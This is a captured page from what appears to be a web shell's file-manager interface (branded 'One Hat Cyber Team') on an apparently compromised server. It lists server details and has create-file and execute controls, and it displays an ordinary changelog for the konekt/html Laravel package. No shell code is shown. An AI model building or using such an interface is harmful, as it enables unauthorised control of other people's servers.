⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.19
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Server Software:
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
id
/
erp.dev-unit.com
/
vendor
/
konekt
/
html
/
View File Name :
Changelog.md
# Changelog ## 6.5.1 #### 2024-09-27 - Fixed deprecation notices for PHP 8.4 - Removed the default value `$url = null` from the constructor of `HtmlBuilder`. It was followed by a required parameter thus had no effect. Additionally, the class doesn't handle situations where the `UrlGenerator $url` property is null, therefore it's safe to assume that nobody can actually use this class with a `null` UrlGenerator. - Explicitly marked the `$request` parameter as nullable in the `FormBuilder`'s constructor. It was already implicitly nullable due to its default value. - Fixed deprecation notices in test cases by explicitly adding properties to the test classes. ## 6.5.0 #### 2024-03-12 - Fork of laravelcollective/html:6.x on Mar 12, 2024 - Dropped PHP < 8.1 version support - Dropped Laravel 6 - 9 version support - Added Laravel 11 version support - Converted the travis test runners to Github Actions - Drop-in replacement of the v6.4 version of the original package - Upgraded PHPUnit to v10